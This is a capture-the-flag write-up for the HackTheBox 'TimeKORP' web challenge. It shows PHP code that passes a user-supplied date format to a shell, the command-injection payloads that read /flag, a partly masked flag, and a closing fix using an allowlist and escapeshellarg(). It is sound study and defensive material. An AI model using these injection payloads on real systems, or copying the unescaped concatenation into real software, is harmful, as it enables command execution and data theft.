TimeKORP

  • 🌐 Website: HackTheBox
  • 🔥 Level: Very Easy
  • 📚 Category: Web
  • 🔗 Link: TimeKORP

📜 Description

Are you ready to uncover the mysteries and expose the truth hidden within KROP’s digital domain? Join the challenge and prove your skills in the world of cybersecurity. Remember, time is money, but in this case the rewards may be much greater than you imagine.

📋 Walkthrough

The site looks very simple: it shows the current time.

We notice that the URL has this structure:

http://94.237.57.211:43954/?format=%H:%M:%S

There is also another page with a similar format:

http://94.237.57.211:43954/?format=%Y-%m-%d

By changing the format parameter, the content is reflected on the webpage.

Let’s take a look at the source code:

public function index($router)
{
    $format = isset($_GET['format']) ? $_GET['format'] : '%H:%M:%S';
    $time = new TimeModel($format);
    return $router->view('index', ['time' => $time->getTime()]);
}

If the format parameter is not provided, it defaults to %H:%M:%S. Now let’s see how getTime() is implemented:

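public function __construct($format)
{
    // User-controlled $format is concatenated into the shell command without any escaping
    $this->command = "date '+" . $format . "' 2>&1";
}

public function getTime()
{
    // exec() passes the string to a shell and returns the last line of output
    $time = exec($this->command);
    $res  = isset($time) ? $time : '?';
    return $res;
}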

The value of format is concatenated into a shell command that is then executed by exec. With the default format, the full command looks like this:

date '+%H:%M:%S' 2>&1

Because the value lands inside single quotes, a ' in format closes the quoted argument, and a ; after it starts a second command. The trick is to concatenate additional commands to the base one. Let’s try with a simple echo:

%H:%M:%S'; echo 'hello

The resulting command becomes:

date '+%H:%M:%S'; echo 'hello' 2>&1

And indeed the page returns “hello”:

<span class='text-muted'>It's</span> hello<span class='text-muted'>.</span>

Now we can simply read the flag with cat /flag using the payload:

'; cat '/flag

Answer

HTB{t1m3_f0r_th3_ult1m4t3_pwn4g3_****}
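
For the defensive side of the TimeModel code shown above, here is an added example (not the challenge's code) of two ways to close the injection: dropping the shell entirely, or quoting the argument. SafeTimeModel, its method names and the allowlist of specifiers are assumptions based on the two format URLs on this page.

```php
<?php
declare(strict_types=1);

// Added example, not the challenge's code. SafeTimeModel and its methods are hypothetical names.
final class SafeTimeModel
{
    // strftime-style specifiers used by the site's two links, mapped to PHP date() characters.
    private const SPEC = ['%H' => 'H', '%M' => 'i', '%S' => 's', '%Y' => 'Y', '%m' => 'm', '%d' => 'd'];
    private const DEFAULT_FORMAT = '%H:%M:%S';

    private string $format;

    public function __construct(string $format)
    {
        // Allowlist: known specifiers, optionally separated by ':' or '-'. Anything else falls back.
        $ok = preg_match('/\A(?:%[HMSYmd][:\-]?){1,6}\z/', $format) === 1;
        $this->format = $ok ? $format : self::DEFAULT_FORMAT;
    }

    // Preferred fix: no shell at all. Translate the validated format and call date().
    public function getTime(): string
    {
        return date(strtr($this->format, self::SPEC));
    }

    // If the external date binary must stay: pass the format as one quoted argument.
    public static function quotedCommand(string $format): string
    {
        return 'date ' . escapeshellarg('+' . $format) . ' 2>&1';
    }
}

// Constructed inputs: the page's two legitimate formats and its echo test string.
foreach (['%H:%M:%S', '%Y-%m-%d', "%H:%M:%S'; echo 'hello"] as $input) {
    $model = new SafeTimeModel($input);
    echo $input, "\n  date():  ", $model->getTime(), "\n  quoted:  ", SafeTimeModel::quotedCommand($input), "\n";
}
```

For the third input the constructor falls back to the default format, and quotedCommand() shows the whole string reaching date as a single argument on a POSIX shell, so nothing after the quote runs as a command.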